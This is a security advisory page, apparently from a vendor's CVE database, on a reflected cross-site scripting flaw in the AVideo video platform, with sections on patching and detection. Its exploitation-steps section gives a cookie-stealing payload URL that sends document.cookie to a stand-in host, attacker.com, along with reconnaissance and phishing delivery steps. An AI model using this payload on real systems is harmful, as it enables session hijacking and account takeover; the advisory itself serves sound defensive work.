CVE-2026-33035: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33035 is a reflected cross-site scripting (XSS) vulnerability in WWBN AVideo, an open source video platform, that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser. It affects AVideo versions 25.0 and below (all versions prior to 26.0). The vulnerability was published on March 16, 2026, and patched in version 26.0. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.3 (Medium) (Github Advisory, AVideo Security Advisory).

Technical details

The vulnerability (CWE-79) is caused by two issues working in tandem. First, in view/videoNotFound.php (line 49), user input from the 404ErrorMsg URL parameter is passed through PHP's json_encode() with default flags, which escapes quotes and backslashes but does not escape HTML special characters (<, >, /), allowing raw HTML tags to flow into JavaScript. Second, in view/js/script.js, the avideoAlertHTMLText() function (and three other alert functions) assigns this value to span.innerHTML, which causes the browser to parse and execute embedded HTML/JavaScript. The full data flow is: ?404ErrorMsg=PAYLOAD → $_REQUEST['404ErrorMsg'] → json_encode() → avideoAlertInfo() → avideoAlert() → avideoAlertHTMLText() → span.innerHTML = msg. The innerHTML sink exists in four separate functions, meaning any future code passing user input to these alert helpers would also be vulnerable (Github Advisory, AVideo Security Advisory).

Impact

Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browser of any user who clicks a crafted link. Because the PHPSESSID cookie lacks the HttpOnly flag by default, attackers can steal session cookies and perform full account takeover, including administrator accounts. Additional escalation paths include injecting phishing login forms within the SweetAlert modal, spreading self-propagating payloads via comments or messages, and gaining complete administrative control over the AVideo platform (Github Advisory, AVideo Security Advisory).

Exploitability

A concrete proof-of-concept (PoC) payload is publicly documented in the GitHub Security Advisory: https://[target]/view/videoNotFound.php?404ErrorMsg=<img src=x onerror=alert(document.domain)>. No authentication or special privileges are required — only user interaction (a victim clicking the crafted URL). The EPSS score is approximately 0.041% (13th percentile), and there is no evidence of active in-the-wild exploitation or CISA KEV catalog listing as of the time of publication (AVideo Security Advisory, Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify publicly accessible AVideo instances running version 25.0 or below using search engines (e.g., Shodan, Censys) or by checking the AVideo version disclosure on the platform's web interface.
  2. Craft malicious URL: Construct a URL targeting the vulnerable endpoint with an XSS payload in the 404ErrorMsg parameter, e.g.:
    https://[target]/view/videoNotFound.php?404ErrorMsg=<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>
  3. Deliver the payload: Send the crafted URL to a victim (e.g., via phishing email, social engineering, or embedding in a forum post). The attack requires the victim to click the link.
  4. JavaScript execution: When the victim loads the page, PHP renders avideoAlertInfo("<img src=x onerror=...>"); into the page. The avideoAlertHTMLText() function assigns this to span.innerHTML, causing the browser to instantiate the <img> element and fire the onerror handler.
  5. Session hijacking / escalation: The executed JavaScript exfiltrates the PHPSESSID cookie (accessible due to missing HttpOnly flag) to the attacker's server, enabling account takeover. For admin targeting, deliver the link specifically to an administrator to gain full platform control (AVideo Security Advisory, Github Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after visiting an AVideo page (potential cookie exfiltration); unusual GET/POST requests to attacker-controlled infrastructure containing URL-encoded cookie values.
  • Logs: Web server access logs showing requests to /view/videoNotFound.php with URL-encoded HTML tags or JavaScript event handlers (e.g., onerror, onload, <img, <script) in the 404ErrorMsg parameter; multiple requests from different IPs with identical crafted payloads (indicating a phishing campaign).
  • Browser/Session: Unexpected session invalidation or password/email changes on user accounts shortly after a user visited a suspicious AVideo link; new admin sessions originating from unfamiliar IP addresses.
  • File System: Unexpected new files (e.g., web shells) in the AVideo installation directory if the XSS was used to escalate to admin and abuse file upload functionality (AVideo Security Advisory).

Mitigation and workarounds

The primary remediation is to upgrade WWBN AVideo to version 26.0 or later, which includes the fix in commit cca6196 (AVideo Patch Commit). The patch applies two fixes: (1) using json_encode() with JSON_HEX_TAG | JSON_HEX_AMP flags in videoNotFound.php to escape < and > as Unicode escapes, and (2) replacing span.innerHTML = msg with span.textContent = msg in alert functions (introducing a new avideoCreateAlertContent() helper). As additional hardening measures, set the HttpOnly flag on the PHPSESSID cookie to prevent JavaScript access, and deploy a Content-Security-Policy header (default-src 'self'; script-src 'self') to restrict script execution (Github Advisory, AVideo Security Advisory).

Community reactions

The vulnerability was published by DanielnetoDotCom to the WWBN/AVideo repository on March 16, 2026, and reviewed by the GitHub Advisory Database on March 17, 2026. A Bluesky post referencing the CVE was observed shortly after NVD publication, indicating some community awareness. No significant vendor statements beyond the advisory or notable independent researcher commentary have been identified (Github Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management